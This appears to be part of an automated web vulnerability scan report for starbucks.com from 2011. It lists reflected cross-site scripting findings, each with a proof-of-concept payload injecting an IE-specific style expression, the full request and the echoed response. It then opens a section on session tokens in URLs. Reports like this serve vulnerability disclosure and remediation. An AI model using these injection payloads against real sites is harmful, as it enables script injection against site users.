2.315. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/store-products

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c42"style%3d"x%3aexpression(alert(1))"3279581907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c42"style="x:expression(alert(1))"3279581907e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/store-products?a4c42"style%3d"x%3aexpression(alert(1))"3279581907e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:32 GMT
Connection: close
Content-Length: 38439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/store-products?a4c42"style="x:expression(alert(1))"3279581907e=1"/>
...[SNIP]...

2.316. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3bf3"style="x:expression(alert(1))"a81c545b7d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/tea?d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:08 GMT
Connection: close
Content-Length: 37019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/tea?d3bf3"style="x:expression(alert(1))"a81c545b7d9=1"/>
...[SNIP]...

2.317. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/wellness

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7967c"style%3d"x%3aexpression(alert(1))"1b512706177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7967c"style="x:expression(alert(1))"1b512706177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/wellness?7967c"style%3d"x%3aexpression(alert(1))"1b512706177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:56 GMT
Connection: close
Content-Length: 41668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/wellness?7967c"style="x:expression(alert(1))"1b512706177=1"/>
...[SNIP]...

2.318. http://www.starbucks.com/search [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 was submitted in the keywords parameter. This input was echoed as a5e7f"style="x:expression(alert(1))"ea56a668f54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:39 GMT
Content-Length: 34084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='a5e7f"style="x:expression(alert(1))"ea56a668f54"/>
...[SNIP]...

2.319. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe12b"style="x:expression(alert(1))"ef4935acaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:48 GMT
Content-Length: 33998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&fe12b"style="x:expression(alert(1))"ef4935acaa=1"/>
...[SNIP]...

2.320. http://www.starbucks.com/search/ [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 was submitted in the keywords parameter. This input was echoed as 88b3a"style="x:expression(alert(1))"e0f4f9251b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?keywords=88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:20 GMT
Connection: close
Content-Length: 34078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords=88b3a"style="x:expression(alert(1))"e0f4f9251b1"/>
...[SNIP]...

2.321. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ed55"style="x:expression(alert(1))"89be0e08a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:44 GMT
Connection: close
Content-Length: 33719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?5ed55"style="x:expression(alert(1))"89be0e08a98=1"/>
...[SNIP]...

2.322. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b04"style="x:expression(alert(1))"eea619f23d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /site-map?66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:07 GMT
Connection: close
Content-Length: 92906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/site-map?66b04"style="x:expression(alert(1))"eea619f23d6=1"/>
...[SNIP]...

2.323. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62425"style%3d"x%3aexpression(alert(1))"fa95c58147d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62425"style="x:expression(alert(1))"fa95c58147d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /smooth?62425"style%3d"x%3aexpression(alert(1))"fa95c58147d=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=tok1t2g1e4xui3idmv3cq43q; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:39 GMT
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?62425"style="x:expression(alert(1))"fa95c58147d=1"/>
...[SNIP]...

2.324. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79d22"style="x:expression(alert(1))"59609b14b2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smooth/?79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:29:16 GMT
Connection: close
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?79d22"style="x:expression(alert(1))"59609b14b2a=1"/>
...[SNIP]...

2.325. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8188"style="x:expression(alert(1))"8d18f2f6526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store-locator?d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:22 GMT
Connection: close
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/store-locator?d8188"style="x:expression(alert(1))"8d18f2f6526=1"/>
...[SNIP]...

2.326. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff0ed"style="x:expression(alert(1))"b9ac111388f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:48 GMT
Connection: close
Content-Length: 46436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?ff0ed"style="x:expression(alert(1))"b9ac111388f=1"/>
...[SNIP]...

2.327. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /card/set-auto-reload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6593"style%3d"x%3aexpression(alert(1))"22e223ad474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6593"style="x:expression(alert(1))"22e223ad474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /card/set-auto-reload?c6593"style%3d"x%3aexpression(alert(1))"22e223ad474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:32:52 GMT
Connection: close
Content-Length: 36061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="https://www.starbucks.com/card/set-auto-reload?c6593"style="x:expression(alert(1))"22e223ad474=1" />
...[SNIP]...

3. Session token in URL  previous  next
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://www.starbucks.com/about-us  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 38374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.2. http://www.starbucks.com/about-us/company-information  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

